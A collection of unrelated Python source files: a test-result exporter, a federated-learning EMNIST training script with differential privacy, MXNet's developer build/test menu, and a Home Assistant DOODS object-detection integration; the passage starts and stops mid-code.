tc = TestCase(name, classname, elapsed_sec, _stdout, _stderr)
# Test case extra failure / error info
if result == 'FAIL':
tc.add_failure_info(description, _stdout)
elif result == 'ERROR':
tc.add_error_info(description, _stdout)
elif result == 'SKIP' or result == 'NOT_SUPPORTED':
tc.add_skipped_info(description, _stdout)
test_cases.append(tc)
ts = TestSuite("test.suite.ioper.%s" % (platform), test_cases)
test_suites.append(ts)
return TestSuite.to_xml_string(test_suites)
def exporter_junit(self, test_result_ext, test_suite_properties=None):
""" Export test results in JUnit XML compliant format
"""
from junit_xml import TestSuite, TestCase
test_suites = []
test_cases = []
targets = sorted(test_result_ext.keys())
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
test_cases = []
tests = sorted(test_result_ext[target][toolchain].keys())
for test in tests:
test_results = test_result_ext[target][toolchain][test]
for test_res in test_results:
test_ids = sorted(test_res.keys())
for test_no in test_ids:
test_result = test_res[test_no]
name = test_result['description']
classname = '%s.%s.%s.%s'% (self.package, target, toolchain, test_result['id'])
elapsed_sec = test_result['elapsed_time']
_stdout = test_result['output']
if 'target_name_unique' in test_result:
_stderr = test_result['target_name_unique']
else:
_stderr = test_result['target_name']
# Test case
tc = TestCase(name, classname, elapsed_sec, _stdout, _stderr)
# Test case extra failure / error info
message = test_result['result']
if test_result['result'] == 'FAIL':
tc.add_failure_info(message, _stdout)
elif test_result['result'] == 'SKIP' or test_result["result"] == 'NOT_SUPPORTED':
tc.add_skipped_info(message, _stdout)
elif test_result['result'] != 'OK':
tc.add_error_info(message, _stdout)
test_cases.append(tc)
ts = TestSuite("test.suite.%s.%s"% (target, toolchain), test_cases, properties=test_suite_properties[target][toolchain])
test_suites.append(ts)
return TestSuite.to_xml_string(test_suites)
def exporter_print_helper(self, array, print_log=False):
for item in array:
print(" * %s::%s::%s" % (item["target_name"],
item["toolchain_name"],
item["id"]))
if print_log:
log_lines = item["output"].split("\n")
for log_line in log_lines:
print(" %s" % log_line)
def exporter_print(self, test_result_ext, print_log_for_failures=False):
""" Export test results in print format.
"""
failures = []
skips = []
successes = []
unique_test_ids = self.get_all_unique_test_ids(test_result_ext)
targets = sorted(test_result_ext.keys())
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
tests = sorted(test_result_ext[target][toolchain].keys())
for test in tests:
test_runs = test_result_ext[target][toolchain][test]
for test_runner in test_runs:
#test_run = test_result_ext[target][toolchain][test][test_run_number][0]
test_run = test_runner[0]
if "result" in test_run:
if test_run["result"] == "FAIL":
failures.append(test_run)
elif test_run["result"] == "SKIP" or test_run["result"] == "NOT_SUPPORTED":
skips.append(test_run)
elif test_run["result"] == "OK":
successes.append(test_run)
else:
raise Exception("Unhandled result type: %s" % (test_run["result"]))
else:
raise Exception("'test_run' did not have a 'result' value")
if successes:
print("\n\nBuild successes:")
self.exporter_print_helper(successes)
if skips:
print("\n\nBuild skips:")
self.exporter_print_helper(skips)
if failures:
print("\n\nBuild failures:")
self.exporter_print_helper(failures, print_log=print_log_for_failures)
return False
else:
return True
def exporter_text(self, test_result_ext):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time", "Timeout"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {"OK" : 0,
"FAIL" : 0,
"ERROR" : 0,
"UNDEF" : 0,
"IOERR_COPY" : 0,
"IOERR_DISK" : 0,
"IOERR_SERIAL" : 0,
"TIMEOUT" : 0,
"NO_IMAGE" : 0,
"MBED_ASSERT" : 0,
"BUILD_FAILED" : 0,
"NOT_SUPPORTED" : 0
}
unique_test_ids = self.get_all_unique_test_ids(test_result_ext)
targets = sorted(test_result_ext.keys())
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
test_cases = []
tests = sorted(test_result_ext[target][toolchain].keys())
for test in tests:
test_results = test_result_ext[target][toolchain][test]
for test_res in test_results:
test_ids = sorted(test_res.keys())
for test_no in test_ids:
test_result = test_res[test_no]
result_dict[test_result['result']] += 1
pt.add_row([test_result['result'],
test_result['target_name'],
test_result['toolchain_name'],
test_result['id'],
test_result['description'],
test_result['elapsed_time'],
test_result['duration']])
result = pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.items()])
return result
|
|
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Trains and evaluates EMNIST."""
import collections
import functools
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
from dp_ftrl import dp_fedavg
from dp_ftrl import optimizer_utils
from dp_ftrl import training_loop
TEST_BATCH_SIZE = 1024
IRRELEVANT_FLAGS = frozenset(iter(flags.FLAGS))
flags.DEFINE_string(
'experiment_name', 'emnist', 'The name of this experiment. Will be'
'append to --root_output_dir to separate experiment results.')
flags.DEFINE_string('root_output_dir', '/tmp/dpftrl/emnist',
'Root directory for writing experiment output.')
flags.DEFINE_integer('rounds_per_checkpoint', 100,
'How often to checkpoint the global model.')
flags.DEFINE_integer(
'rounds_per_eval', 20,
'How often to evaluate the global model on the validation dataset.')
flags.DEFINE_integer('clients_per_thread', 1, 'TFF executor configuration.')
# Training
flags.DEFINE_integer('clients_per_round', 100,
'How many clients to sample per round.')
flags.DEFINE_integer('client_epochs_per_round', 1,
'Number of epochs in the client to take per round.')
flags.DEFINE_integer('client_batch_size', 16, 'Batch size used on the client.')
flags.DEFINE_integer('total_rounds', 10, 'Number of total training rounds.')
flags.DEFINE_integer(
'total_epochs', None,
'If not None, use shuffling of clients instead of random sampling.')
flags.DEFINE_enum('client_optimizer', 'sgd', ['sgd'], 'Client optimzier')
flags.DEFINE_enum('server_optimizer', 'sgd', [
'sgd', 'ftrlprox', 'dpftrlprox', 'dpftrl', 'dpsgd', 'dpsgdm', 'dpftrlm',
'dpftrlproxd'
], 'Server optimizer')
flags.DEFINE_float('client_lr', 0.02, 'Client learning rate.')
flags.DEFINE_float('server_lr', 1.0, 'Server learning rate.')
# optimizer specific
flags.DEFINE_float('server_momentum', 0.9, 'Server momentum.')
flags.DEFINE_float('decay_rate', 0.5,
'Power decay rate for proximal terms in FTRL.')
# Differential privacy
flags.DEFINE_float('clip_norm', 1.0, 'Clip L2 norm.')
flags.DEFINE_float('noise_multiplier', 0.01,
'Noise multiplier for DP algorithm.')
# EMNIST
flags.DEFINE_boolean('only_digits', True,
'If True, use the 10 digits version of EMNIST.')
HPARAM_FLAGS = [f for f in flags.FLAGS if f not in IRRELEVANT_FLAGS]
FLAGS = flags.FLAGS
def _get_emnist_dataset(
only_digits: bool,
client_epochs_per_round: int,
client_batch_size: int,
):
"""Loads and preprocesses the EMNIST dataset.
Args:
only_digits: If True, load EMNIST with 10 digits. If False, load EMNIST with
62 characters.
client_epochs_per_round: client local epochs for training.
client_batch_size: client batch size for training.
Returns:
A `(emnist_train, emnist_test)` tuple where `emnist_train` is a
`tff.simulation.datasets.ClientData` object representing the training data
and `emnist_test` is a single `tf.data.Dataset` representing the test data
of all clients.
"""
emnist_train, emnist_test = tff.simulation.datasets.emnist.load_data(
only_digits=only_digits)
def element_fn(element):
return collections.OrderedDict(
x=tf.expand_dims(element['pixels'], -1), y=element['label'])
def preprocess_train_dataset(dataset):
# Use buffer_size same as the maximum client dataset size,
# 418 for Federated EMNIST
return dataset.map(element_fn).shuffle(buffer_size=418).repeat(
count=client_epochs_per_round).batch(
client_batch_size, drop_remainder=False)
def preprocess_test_dataset(dataset):
return dataset.map(element_fn).batch(TEST_BATCH_SIZE, drop_remainder=False)
emnist_train = emnist_train.preprocess(preprocess_train_dataset)
emnist_test = preprocess_test_dataset(
emnist_test.create_tf_dataset_from_all_clients())
return emnist_train, emnist_test
def _server_optimizer_fn(model_weights, name, learning_rate, noise_std):
"""Returns server optimizer."""
model_weight_specs = tf.nest.map_structure(
lambda v: tf.TensorSpec(v.shape, v.dtype), model_weights)
if name == 'sgd':
return optimizer_utils.SGDServerOptimizer(learning_rate)
elif name == 'sgdm':
return optimizer_utils.DPSGDMServerOptimizer(
learning_rate,
momentum=FLAGS.server_momentum,
noise_std=0,
model_weight_specs=model_weight_specs)
elif name == 'dpftrl':
return optimizer_utils.DPFTRLMServerOptimizer(
learning_rate,
momentum=0,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
elif name == 'dpsgd':
return optimizer_utils.DPSGDMServerOptimizer(
learning_rate,
momentum=0,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
elif name == 'dpsgdm':
return optimizer_utils.DPSGDMServerOptimizer(
learning_rate,
momentum=FLAGS.server_momentum,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
elif name == 'dpftrlm':
return optimizer_utils.DPFTRLMServerOptimizer(
learning_rate,
momentum=FLAGS.server_momentum,
noise_std=noise_std,
model_weight_specs=model_weight_specs)
else:
raise ValueError('Unknown server optimizer name {}'.format(name))
def _client_optimizer_fn(name, learning_rate):
if name == 'sgd':
return tf.keras.optimizers.SGD(learning_rate)
else:
raise ValueError('Unknown client optimizer name {}'.format(name))
def _create_original_fedavg_cnn_model(only_digits):
"""The CNN model used in https://arxiv.org/abs/1602.05629.
This function is duplicated from research/optimization/emnist/models.py to
make this example completely stand-alone.
Args:
only_digits: If True, uses a final layer with 10 outputs, for use with the
digits only EMNIST dataset. If False, uses 62 outputs for the larger
dataset.
Returns:
An uncompiled `tf.keras.Model`.
"""
data_format = 'channels_last'
input_shape = [28, 28, 1]
max_pool = functools.partial(
tf.keras.layers.MaxPooling2D,
pool_size=(2, 2),
padding='same',
data_format=data_format)
conv2d = functools.partial(
tf.keras.layers.Conv2D,
kernel_size=5,
padding='same',
data_format=data_format,
activation=tf.nn.relu)
model = tf.keras.models.Sequential([
conv2d(filters=32, input_shape=input_shape),
max_pool(),
conv2d(filters=64),
max_pool(),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation=tf.nn.relu),
tf.keras.layers.Dense(10 if only_digits else 62),
tf.keras.layers.Activation(tf.nn.softmax),
])
return model
def _get_client_datasets_fn(train_data):
"""Returns function for client datasets per round."""
if FLAGS.total_epochs is None:
def client_datasets_fn(round_num: int, epoch: int):
del round_num
sampled_clients = np.random.choice(
train_data.client_ids, size=FLAGS.clients_per_round, replace=False)
return [
train_data.create_tf_dataset_for_client(client)
for client in sampled_clients
], epoch
logging.info('Sample clients for max %d rounds', FLAGS.total_rounds)
else:
client_shuffer = training_loop.ClientIDShuffler(FLAGS.clients_per_round,
train_data)
def client_datasets_fn(round_num: int, epoch: int):
sampled_clients, epoch = client_shuffer.sample_client_ids(
round_num, epoch)
return [
train_data.create_tf_dataset_for_client(client)
for client in sampled_clients
], epoch
logging.info('Shuffle clients for max %d epochs and %d rounds',
FLAGS.total_epochs, FLAGS.total_rounds)
return client_datasets_fn
def main(argv):
if len(argv) > 1:
raise app.UsageError('Expected no command-line arguments, '
'got: {}'.format(argv))
client_devices = tf.config.list_logical_devices('GPU')
server_device = tf.config.list_logical_devices('CPU')[0]
tff.backends.native.set_local_python_execution_context(
max_fanout=2 * FLAGS.clients_per_round,
server_tf_device=server_device,
client_tf_devices=client_devices,
clients_per_thread=FLAGS.clients_per_thread)
logging.info('Show FLAGS for debugging:')
for f in HPARAM_FLAGS:
logging.info('%s=%s', f, FLAGS[f].value)
train_data, test_data = _get_emnist_dataset(
FLAGS.only_digits,
FLAGS.client_epochs_per_round,
FLAGS.client_batch_size,
)
def tff_model_fn():
keras_model = _create_original_fedavg_cnn_model(FLAGS.only_digits)
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False)
return dp_fedavg.KerasModelWrapper(keras_model, test_data.element_spec,
loss)
noise_std = FLAGS.clip_norm * FLAGS.noise_multiplier / float(
FLAGS.clients_per_round)
server_optimizer_fn = functools.partial(
_server_optimizer_fn,
name=FLAGS.server_optimizer,
learning_rate=FLAGS.server_lr,
noise_std=noise_std)
client_optimizer_fn = functools.partial(
_client_optimizer_fn,
name=FLAGS.client_optimizer,
learning_rate=FLAGS.client_lr)
iterative_process = dp_fedavg.build_federated_averaging_process(
tff_model_fn,
dp_clip_norm=FLAGS.clip_norm,
server_optimizer_fn=server_optimizer_fn,
client_optimizer_fn=client_optimizer_fn)
keras_metics = [tf.keras.metrics.SparseCategoricalAccuracy()]
model = tff_model_fn()
def evaluate_fn(model_weights, dataset):
model.from_weights(model_weights)
metrics = dp_fedavg.keras_evaluate(model.keras_model, dataset, keras_metics)
return collections.OrderedDict(
(metric.name, metric.result().numpy()) for metric in metrics)
hparam_dict = collections.OrderedDict([
(name, FLAGS[name].value) for name in HPARAM_FLAGS
])
total_epochs = 0 if FLAGS.total_epochs is None else FLAGS.total_epochs
training_loop.run(
iterative_process,
client_datasets_fn=_get_client_datasets_fn(train_data),
validation_fn=functools.partial(evaluate_fn, dataset=test_data),
total_rounds=FLAGS.total_rounds,
total_epochs=total_epochs,
experiment_name=FLAGS.experiment_name,
train_eval_fn=None,
test_fn=functools.partial(evaluate_fn, dataset=test_data),
root_output_dir=FLAGS.root_output_dir,
hparam_dict=hparam_dict,
rounds_per_eval=FLAGS.rounds_per_eval,
rounds_per_checkpoint=FLAGS.rounds_per_checkpoint,
rounds_per_train_eval=2000)
if __name__ == '__main__':
app.run(main)
|
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
"""Tool to ease working with the build system and reproducing test results"""
import argparse
import os
import sys
from subprocess import check_call
import shlex
from ci.util import retry, remember_cwd
from typing import List
from collections import OrderedDict
import logging
import yaml
import shutil
DEFAULT_PYENV=os.environ.get('DEFAULT_PYENV','py3_venv')
DEFAULT_PYTHON=os.environ.get('DEFAULT_PYTHON','python3')
DEFAULT_CMAKE_OPTIONS=os.environ.get('DEFAULT_CMAKE_OPTIONS','cmake_options.yml')
class Confirm(object):
def __init__(self, cmds):
self.cmds = cmds
def __call__(self):
resp = input("This will run the following command(s) '{}' are you sure? yes / no: ".format(self.cmds))
while True:
if resp.lower() == 'yes':
handle_commands(self.cmds)
return
elif resp.lower() == 'no':
return
else:
resp = input("Please answer yes or no: ")
class CMake(object):
def __init__(self, cmake_options_yaml=DEFAULT_CMAKE_OPTIONS, cmake_options_yaml_default='cmake/cmake_options.yml'):
if os.path.exists(cmake_options_yaml):
self.cmake_options_yaml = cmake_options_yaml
else:
self.cmake_options_yaml = cmake_options_yaml_default
logging.info('Using {} for CMake configuration'.format(self.cmake_options_yaml))
self.cmake_options = None
self.read_config()
def cmake_command(self) -> str:
"""
:return: Cmake command to run given the options
"""
cmd_lst = ['cmake', '-C', 'config.cmake']
cmd_lst.extend(self._cmdlineflags())
return cmd_lst
def __call__(self, build_dir='build', generator='Ninja', build_cmd='ninja'):
logging.info("CMake / {} build in directory {}".format(
generator, os.path.abspath(build_dir)))
cmd_lst = self.cmake_command()
os.makedirs(build_dir, exist_ok=True)
with remember_cwd():
os.chdir(build_dir)
cmd_lst.extend(['-G{}'.format(generator), '..'])
logging.info('Executing: {}'.format('\t\n'.join(cmd_lst)))
check_call(cmd_lst)
logging.info('Now building')
check_call(shlex.split(build_cmd))
def create_virtualenv(venv_exe, pyexe, venv) -> None:
logging.info("Creating virtualenv in %s with python %s", venv, pyexe)
if not (venv_exe and pyexe and venv):
logging.warn("Skipping creation of virtualenv")
return
check_call([venv_exe, '-p', pyexe, venv])
def create_virtualenv_default():
create_virtualenv('virtualenv', DEFAULT_PYTHON, DEFAULT_PYENV)
logging.info("You can use the virtualenv by executing 'source %s/bin/activate'", DEFAULT_PYENV)
def provision_virtualenv(venv_path=DEFAULT_PYENV):
pip = os.path.join(venv_path, 'bin', 'pip')
if os.path.exists(pip):
# Install MXNet python bindigs
check_call([pip, 'install', '--upgrade', '--force-reinstall', '-e', 'python'])
# Install test dependencies
check_call([pip, 'install', '--upgrade', '--force-reinstall', '-r',
os.path.join('ci', 'docker', 'install', 'requirements')])
else:
logging.warn("Can't find pip: '%s' not found", pip)
COMMANDS = OrderedDict([
('[Local] BUILD CMake/Ninja (using cmake_options.yaml (cp cmake/cmake_options.yml .) and edit) ({} virtualenv in "{}")'.format(DEFAULT_PYTHON, DEFAULT_PYENV),
[
CMake(),
create_virtualenv_default,
provision_virtualenv,
]),
('[Local] Python Unit tests',
"pytest -v tests/python/unittest/"
),
('[Docker] Build the MXNet binary - outputs to "lib/"',
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_ubuntu_cpu"),
('[Docker] Build the Jekyll website - outputs to "docs/static_site/build/html/"',
"ci/build.py --platform ubuntu_cpu_jekyll /work/runtime_functions.sh build_jekyll_docs"),
('[Docker] Build the Python API docs - outputs to "docs/python_docs/python/build/_build/html/"',
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_python_docs"),
('[Docker] sanity_check. Check for linting and code formatting and licenses.',
[
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh sanity_check",
]),
('[Docker] Python3 CPU unittests',
[
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_ubuntu_cpu_openblas",
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh unittest_ubuntu_python3_cpu",
]),
('[Docker] Python3 GPU unittests',
[
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh build_ubuntu_gpu",
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh unittest_ubuntu_python3_gpu",
]),
('[Docker] Python3 GPU+oneDNN unittests',
[
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh build_ubuntu_gpu_onednn",
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh unittest_ubuntu_python3_gpu",
]),
('[Docker] Python3 CPU oneDNN unittests',
[
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_ubuntu_cpu_onednn",
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh unittest_ubuntu_python3_cpu",
]),
('[Docker] Python3 ARMv7 unittests (QEMU)',
[
"ci/build.py -p armv7",
"ci/build.py -p test.armv7 /work/runtime_functions.sh unittest_ubuntu_python3_arm"
]),
('Clean (RESET HARD) repository (Warning! erases local changes / DATA LOSS)',
Confirm("ci/docker/runtime_functions.sh clean_repo"))
])
def clip(x, mini, maxi):
return min(max(x,mini), maxi)
@retry((ValueError, RuntimeError), 3, delay_s = 0)
def show_menu(items: List[str], header=None) -> int:
print('\n-- MXNet dev menu --\n')
def hr():
print(''.join(['-']*30))
if header:
print(header)
hr()
for i,x in enumerate(items,1):
print('{}. {}'.format(i,x))
hr()
choice = int(input('Choose option> ')) - 1
if choice < 0 or choice >= len(items):
raise RuntimeError('Choice must be between {} and {}'.format(1, len(items)))
return choice
def handle_commands(cmds) -> None:
def handle_command(cmd):
logging.info("Executing command: %s",cmd)
check_call(shlex.split(cmd))
if type(cmds) is list:
for cmd in cmds:
handle_commands(cmd)
elif type(cmds) is str:
handle_command(cmds)
elif callable(cmds):
cmds()
else:
raise RuntimeError("handle_commands(cmds): argument should be str or List[str] but is %s", type(cmds))
def use_menu_ui(args) -> None:
command_list = list(COMMANDS.keys())
if hasattr(args, 'choice') and args.choice and args.choice[0].isdigit():
choice = int(args.choice[0]) - 1
else:
choice = show_menu(command_list, 'Available actions')
handle_commands(COMMANDS[command_list[choice]])
def build(args) -> None:
"""Build using CMake"""
venv_exe = shutil.which('virtualenv')
pyexe = shutil.which(args.pyexe)
if not venv_exe:
logging.warn("virtualenv wasn't found in path, it's recommended to install virtualenv to manage python environments")
if not pyexe:
logging.warn("Python executable %s not found in path", args.pyexe)
if args.cmake_options:
cmake = CMake(args.cmake_options)
else:
cmake = CMake()
cmake()
create_virtualenv_default()
provision_virtualenv()
def main():
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser(description="""Utility for compiling and testing MXNet easily""")
parser.set_defaults(command='use_menu_ui')
subparsers = parser.add_subparsers(help='sub-command help')
build_parser = subparsers.add_parser('build', help='build with the specified flags from file')
build_parser.add_argument('cmake_options', nargs='?',
help='File containing CMake options in YAML')
build_parser.add_argument('-v', '--venv',
type=str,
default=DEFAULT_PYENV,
help='virtualenv dir')
build_parser.add_argument('-p', '--pyexe',
type=str,
default=DEFAULT_PYTHON,
help='python executable')
build_parser.set_defaults(command='build')
menu_parser = subparsers.add_parser('menu', help='jump to menu option #')
menu_parser.set_defaults(command='use_menu_ui')
menu_parser.add_argument('choice', nargs=1)
args = parser.parse_args()
globals()[args.command](args)
return 0
if __name__ == '__main__':
sys.exit(main())
|
|
"""Support for the DOODS service."""
import io
import logging
import time
from PIL import Image, ImageDraw
from pydoods import PyDOODS
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_CONFIDENCE,
CONF_ENTITY_ID,
CONF_NAME,
CONF_SOURCE,
PLATFORM_SCHEMA,
ImageProcessingEntity,
)
from homeassistant.const import CONF_TIMEOUT
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
from homeassistant.util.pil import draw_box
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = "matches"
ATTR_SUMMARY = "summary"
ATTR_TOTAL_MATCHES = "total_matches"
CONF_URL = "url"
CONF_AUTH_KEY = "auth_key"
CONF_DETECTOR = "detector"
CONF_LABELS = "labels"
CONF_AREA = "area"
CONF_COVERS = "covers"
CONF_TOP = "top"
CONF_BOTTOM = "bottom"
CONF_RIGHT = "right"
CONF_LEFT = "left"
CONF_FILE_OUT = "file_out"
AREA_SCHEMA = vol.Schema(
{
vol.Optional(CONF_BOTTOM, default=1): cv.small_float,
vol.Optional(CONF_LEFT, default=0): cv.small_float,
vol.Optional(CONF_RIGHT, default=1): cv.small_float,
vol.Optional(CONF_TOP, default=0): cv.small_float,
vol.Optional(CONF_COVERS, default=True): cv.boolean,
}
)
LABEL_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_AREA): AREA_SCHEMA,
vol.Optional(CONF_CONFIDENCE): vol.Range(min=0, max=100),
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_URL): cv.string,
vol.Required(CONF_DETECTOR): cv.string,
vol.Required(CONF_TIMEOUT, default=90): cv.positive_int,
vol.Optional(CONF_AUTH_KEY, default=""): cv.string,
vol.Optional(CONF_FILE_OUT, default=[]): vol.All(cv.ensure_list, [cv.template]),
vol.Optional(CONF_CONFIDENCE, default=0.0): vol.Range(min=0, max=100),
vol.Optional(CONF_LABELS, default=[]): vol.All(
cv.ensure_list, [vol.Any(cv.string, LABEL_SCHEMA)]
),
vol.Optional(CONF_AREA): AREA_SCHEMA,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Doods client."""
url = config[CONF_URL]
auth_key = config[CONF_AUTH_KEY]
detector_name = config[CONF_DETECTOR]
timeout = config[CONF_TIMEOUT]
doods = PyDOODS(url, auth_key, timeout)
response = doods.get_detectors()
if not isinstance(response, dict):
_LOGGER.warning("Could not connect to doods server: %s", url)
return
detector = {}
for server_detector in response["detectors"]:
if server_detector["name"] == detector_name:
detector = server_detector
break
if not detector:
_LOGGER.warning(
"Detector %s is not supported by doods server %s", detector_name, url
)
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(
Doods(
hass,
camera[CONF_ENTITY_ID],
camera.get(CONF_NAME),
doods,
detector,
config,
)
)
add_entities(entities)
class Doods(ImageProcessingEntity):
"""Doods image processing service client."""
def __init__(self, hass, camera_entity, name, doods, detector, config):
"""Initialize the DOODS entity."""
self.hass = hass
self._camera_entity = camera_entity
if name:
self._name = name
else:
name = split_entity_id(camera_entity)[1]
self._name = f"Doods {name}"
self._doods = doods
self._file_out = config[CONF_FILE_OUT]
self._detector_name = detector["name"]
# detector config and aspect ratio
self._width = None
self._height = None
self._aspect = None
if detector["width"] and detector["height"]:
self._width = detector["width"]
self._height = detector["height"]
self._aspect = self._width / self._height
# the base confidence
dconfig = {}
confidence = config[CONF_CONFIDENCE]
# handle labels and specific detection areas
labels = config[CONF_LABELS]
self._label_areas = {}
self._label_covers = {}
for label in labels:
if isinstance(label, dict):
label_name = label[CONF_NAME]
if label_name not in detector["labels"] and label_name != "*":
_LOGGER.warning("Detector does not support label %s", label_name)
continue
# If label confidence is not specified, use global confidence
label_confidence = label.get(CONF_CONFIDENCE)
if not label_confidence:
label_confidence = confidence
if label_name not in dconfig or dconfig[label_name] > label_confidence:
dconfig[label_name] = label_confidence
# Label area
label_area = label.get(CONF_AREA)
self._label_areas[label_name] = [0, 0, 1, 1]
self._label_covers[label_name] = True
if label_area:
self._label_areas[label_name] = [
label_area[CONF_TOP],
label_area[CONF_LEFT],
label_area[CONF_BOTTOM],
label_area[CONF_RIGHT],
]
self._label_covers[label_name] = label_area[CONF_COVERS]
else:
if label not in detector["labels"] and label != "*":
_LOGGER.warning("Detector does not support label %s", label)
continue
self._label_areas[label] = [0, 0, 1, 1]
self._label_covers[label] = True
if label not in dconfig or dconfig[label] > confidence:
dconfig[label] = confidence
if not dconfig:
dconfig["*"] = confidence
# Handle global detection area
self._area = [0, 0, 1, 1]
self._covers = True
area_config = config.get(CONF_AREA)
if area_config:
self._area = [
area_config[CONF_TOP],
area_config[CONF_LEFT],
area_config[CONF_BOTTOM],
area_config[CONF_RIGHT],
]
self._covers = area_config[CONF_COVERS]
template.attach(hass, self._file_out)
self._dconfig = dconfig
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera_entity
@property
def name(self):
"""Return the name of the image processor."""
return self._name
@property
def state(self):
"""Return the state of the entity."""
return self._total_matches
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_MATCHES: self._matches,
ATTR_SUMMARY: {
label: len(values) for label, values in self._matches.items()
},
ATTR_TOTAL_MATCHES: self._total_matches,
}
def _save_image(self, image, matches, paths):
img = Image.open(io.BytesIO(bytearray(image))).convert("RGB")
img_width, img_height = img.size
draw = ImageDraw.Draw(img)
# Draw custom global region/area
if self._area != [0, 0, 1, 1]:
draw_box(
draw, self._area, img_width, img_height, "Detection Area", (0, 255, 255)
)
for label, values in matches.items():
# Draw custom label regions/areas
if label in self._label_areas and self._label_areas[label] != [0, 0, 1, 1]:
box_label = f"{label.capitalize()} Detection Area"
draw_box(
draw,
self._label_areas[label],
img_width,
img_height,
box_label,
(0, 255, 0),
)
# Draw detected objects
for instance in values:
box_label = f'{label} {instance["score"]:.1f}%'
# Already scaled, use 1 for width and height
draw_box(
draw,
instance["box"],
img_width,
img_height,
box_label,
(255, 255, 0),
)
for path in paths:
_LOGGER.info("Saving results image to %s", path)
img.save(path)
def process_image(self, image):
"""Process the image."""
img = Image.open(io.BytesIO(bytearray(image)))
img_width, img_height = img.size
if self._aspect and abs((img_width / img_height) - self._aspect) > 0.1:
_LOGGER.debug(
"The image aspect: %s and the detector aspect: %s differ by more than 0.1",
(img_width / img_height),
self._aspect,
)
# Run detection
start = time.monotonic()
response = self._doods.detect(
image, dconfig=self._dconfig, detector_name=self._detector_name
)
_LOGGER.debug(
"doods detect: %s response: %s duration: %s",
self._dconfig,
response,
time.monotonic() - start,
)
matches = {}
total_matches = 0
if not response or "error" in response:
if "error" in response:
_LOGGER.error(response["error"])
self._matches = matches
self._total_matches = total_matches
return
for detection in response["detections"]:
score = detection["confidence"]
boxes = [
detection["top"],
detection["left"],
detection["bottom"],
detection["right"],
]
label = detection["label"]
# Exclude unlisted labels
if "*" not in self._dconfig and label not in self._dconfig:
continue
# Exclude matches outside global area definition
if self._covers:
if (
boxes[0] < self._area[0]
or boxes[1] < self._area[1]
or boxes[2] > self._area[2]
or boxes[3] > self._area[3]
):
continue
else:
if (
boxes[0] > self._area[2]
or boxes[1] > self._area[3]
or boxes[2] < self._area[0]
or boxes[3] < self._area[1]
):
continue
# Exclude matches outside label specific area definition
if self._label_areas.get(label):
if self._label_covers[label]:
if (
boxes[0] < self._label_areas[label][0]
or boxes[1] < self._label_areas[label][1]
or boxes[2] > self._label_areas[label][2]
or boxes[3] > self._label_areas[label][3]
):
continue
else:
if (
boxes[0] > self._label_areas[label][2]
or boxes[1] > self._label_areas[label][3]
or boxes[2] < self._label_areas[label][0]
or boxes[3] < self._label_areas[label][1]
):
continue
if label not in matches:
matches[label] = []
matches[label].append({"score": float(score), "box": boxes})
total_matches += 1
# Save Images
if total_matches and self._file_out:
paths = []
for path_template in self._file_out:
if isinstance(path_template, template.Template):
paths.append(
